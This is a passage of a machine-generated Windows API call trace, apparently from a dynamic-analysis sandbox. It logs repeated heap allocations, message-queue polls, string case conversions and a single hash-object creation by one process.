[0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0157.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0157.080] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0157.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.080] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0157.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.081] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.081] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.081] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.081] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.081] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.081] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.082] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.082] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.082] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.082] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.082] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.082] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.082] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.083] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.083] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.083] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.083] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0157.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.083] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.083] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.084] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0157.084] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0157.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0157.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0157.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaadf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0157.084] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0157.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.086] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69760 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0157.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69ac0 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0157.087] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.087] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.087] RtlAllocateHeap 